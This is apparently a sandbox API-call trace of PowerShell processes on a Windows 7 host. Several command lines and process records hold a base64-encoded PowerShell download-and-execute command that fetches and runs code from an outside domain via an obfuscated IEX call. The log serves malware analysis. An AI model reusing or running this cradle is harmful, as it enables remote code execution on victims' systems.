	[0877.944] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.944] SetErrorMode (uMode=0x1) returned 0x1
	[0877.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.945] SetErrorMode (uMode=0x1) returned 0x1
	[0877.945] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.945] SetErrorMode (uMode=0x1) returned 0x1
	[0877.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.946] SetErrorMode (uMode=0x1) returned 0x1
	[0877.946] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0877.946] SetErrorMode (uMode=0x1) returned 0x1
	[0877.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c84da00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0877.946] SetErrorMode (uMode=0x1) returned 0x1
	[0877.946] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c84dba0 | out: lpFindFileData=0x1c84dba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b7e46b0
	[0877.947] FindNextFileW (in: hFindFile=0x1b7e46b0, lpFindFileData=0x1c84dbb0 | out: lpFindFileData=0x1c84dbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0877.948] FindClose (in: hFindFile=0x1b7e46b0 | out: hFindFile=0x1b7e46b0) returned 1
	[0877.948] SetErrorMode (uMode=0x1) returned 0x1
	[0877.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c84dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0877.949] SetErrorMode (uMode=0x1) returned 0x1
	[0877.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c84ded0 | out: lpFileInformation=0x1c84ded0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0877.949] SetErrorMode (uMode=0x1) returned 0x1
	[0877.950] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0877.950] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.950] CoTaskMemFree (pv=0x181ae0) 
	[0877.952] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0877.952] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.952] CoTaskMemFree (pv=0x181ae0) 
	[0877.956] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0877.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.956] CoTaskMemFree (pv=0x181ae0) 
	[0877.966] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0877.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0877.966] CoTaskMemFree (pv=0x181ae0) 
	[0879.524] CoTaskMemAlloc (cb=0x3b) returned 0x1b81b4a0
	[0879.524] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84e0b8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84e0b8) returned 0x4550
	[0879.525] CoTaskMemFree (pv=0x1b81b4a0) 
	[0879.528] GetConsoleWindow () returned 0x10430
	[0879.536] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0879.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0879.536] CoTaskMemFree (pv=0x181ae0) 
	[0879.537] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0879.537] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0879.537] CoTaskMemFree (pv=0x181ae0) 
	[0879.543] CoTaskMemAlloc (cb=0x104) returned 0x181ae0
	[0879.543] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x181ae0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0879.543] CoTaskMemFree (pv=0x181ae0) 
	[0881.880] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c84e100 | out: pNumArgs=0x1c84e100) returned 0x110ec0*=""
	[0881.881] lstrlenW (lpString="-EncodedCommand") returned 15
	[0881.882] CoTaskMemAlloc (cb=0x22) returned 0x1b807bd0
	[0881.882] RtlMoveMemory (in: Destination=0x1b807bd0, Source=0x110ee2, Length=0x20 | out: Destination=0x1b807bd0) 
	[0881.882] CoTaskMemFree (pv=0x1b807bd0) 
	[0881.882] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0881.882] CoTaskMemAlloc (cb=0x2f4) returned 0x1b803fb0
	[0881.882] RtlMoveMemory (in: Destination=0x1b803fb0, Source=0x110f02, Length=0x2f2 | out: Destination=0x1b803fb0) 
	[0881.882] CoTaskMemFree (pv=0x1b803fb0) 
	[0881.883] LocalFree (hMem=0x110ec0) returned 0x0
	[0881.884] CoTaskMemAlloc (cb=0x804) returned 0x1b820fa0
	[0881.884] GetConsoleTitleW (in: lpConsoleTitle=0x1b820fa0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0881.884] CoTaskMemFree (pv=0x1b820fa0) 
	[0881.893] CoTaskMemAlloc (cb=0x38e) returned 0x110ec0
	[0881.893] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c84e060*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x31032f8 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x31032f8*(hProcess=0x35c, hThread=0x358, dwProcessId=0x25dc, dwThreadId=0x25e0)) returned 1
	[0881.911] CoTaskMemFree (pv=0x110ec0) 
	[0881.914] CloseHandle (hObject=0x358) returned 1
	[0881.914] CoTaskMemAlloc (cb=0x3b) returned 0x1b81b4a0
	[0881.914] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c84e108, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c84e108) returned 0x4550
	[0881.915] CoTaskMemFree (pv=0x1b81b4a0) 
	[0881.918] GetCurrentProcess () returned 0xffffffffffffffff
	[0881.919] GetCurrentProcess () returned 0xffffffffffffffff
	[0881.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c84e1e8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c84e1e8*=0x358) returned 1

Process:
	id = "63"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x730fd000"
	os_pid = "0xf4c"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0x4b4"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 313
	os_tid = 0xf50


Thread:
	id = 404
	os_tid = 0x103c


Thread:
	id = 407
	os_tid = 0x1048


Process:
	id = "64"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1a01b000"
	os_pid = "0xf54"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "5"
	os_parent_pid = "0x804"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 314
	os_tid = 0xf58

	[0497.274] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0500.759] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0500.759] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0500.759] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0500.759] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0505.495] GetVersionExW (in: lpVersionInformation=0xcdcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdcc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0505.497] GetVersionExW (in: lpVersionInformation=0xcdcc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcdcc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0505.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.506] GetVersionExW (in: lpVersionInformation=0xcda30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcda30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0505.507] SetErrorMode (uMode=0x1) returned 0x1
	[0505.508] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcdb90 | out: lpFileInformation=0xcdb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0505.509] SetErrorMode (uMode=0x1) returned 0x1
	[0505.513] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcde00 | out: lpdwHandle=0xcde00) returned 0x94c
	[0505.515] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2dc72a0 | out: lpData=0x2dc72a0) returned 1
	[0505.522] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcdd78, puLen=0xcdd70 | out: lplpBuffer=0xcdd78*=0x2dc733c, puLen=0xcdd70) returned 1
	[0505.525] lstrlenW (lpString="䅁") returned 1
	[0505.534] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc7418, puLen=0xcdce0) returned 1
	[0505.534] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0506.022] CoTaskMemAlloc (cb=0x2e) returned 0x32fc40
	[0506.022] lstrcpyW (in: lpString1=0x32fc40, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0506.023] CoTaskMemFree (pv=0x32fc40) 
	[0506.023] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc746c, puLen=0xcdce0) returned 1
	[0506.023] lstrlenW (lpString="System.Management.Automation") returned 28
	[0506.023] CoTaskMemAlloc (cb=0x3c) returned 0x269e80
	[0506.023] lstrcpyW (in: lpString1=0x269e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0506.023] CoTaskMemFree (pv=0x269e80) 
	[0506.023] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc74c8, puLen=0xcdce0) returned 1
	[0506.023] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0506.023] CoTaskMemAlloc (cb=0x20) returned 0x330120
	[0506.023] lstrcpyW (in: lpString1=0x330120, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0506.024] CoTaskMemFree (pv=0x330120) 
	[0506.024] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc7508, puLen=0xcdce0) returned 1
	[0506.024] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0506.024] CoTaskMemAlloc (cb=0x44) returned 0x269e80
	[0506.024] lstrcpyW (in: lpString1=0x269e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0506.024] CoTaskMemFree (pv=0x269e80) 
	[0506.024] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc7570, puLen=0xcdce0) returned 1
	[0506.024] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0506.024] CoTaskMemAlloc (cb=0x76) returned 0x2cf240
	[0506.024] lstrcpyW (in: lpString1=0x2cf240, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0506.024] CoTaskMemFree (pv=0x2cf240) 
	[0506.024] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc760c, puLen=0xcdce0) returned 1
	[0506.024] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0506.024] CoTaskMemAlloc (cb=0x44) returned 0x269e80
	[0506.024] lstrcpyW (in: lpString1=0x269e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0506.024] CoTaskMemFree (pv=0x269e80) 
	[0506.024] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc7670, puLen=0xcdce0) returned 1
	[0506.024] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0506.024] CoTaskMemAlloc (cb=0x58) returned 0x28f7f0
	[0506.025] lstrcpyW (in: lpString1=0x28f7f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0506.025] CoTaskMemFree (pv=0x28f7f0) 
	[0506.025] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc76ec, puLen=0xcdce0) returned 1
	[0506.025] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0506.025] CoTaskMemAlloc (cb=0x20) returned 0x330120
	[0506.025] lstrcpyW (in: lpString1=0x330120, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0506.025] CoTaskMemFree (pv=0x330120) 
	[0506.025] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x2dc7394, puLen=0xcdce0) returned 1
	[0506.025] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0506.025] CoTaskMemAlloc (cb=0x66) returned 0x2ac530
	[0506.025] lstrcpyW (in: lpString1=0x2ac530, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0506.025] CoTaskMemFree (pv=0x2ac530) 
	[0506.025] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x0, puLen=0xcdce0) returned 0
	[0506.025] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x0, puLen=0xcdce0) returned 0
	[0506.025] VerQueryValueW (in: pBlock=0x2dc72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcdce8, puLen=0xcdce0 | out: lplpBuffer=0xcdce8*=0x0, puLen=0xcdce0) returned 0
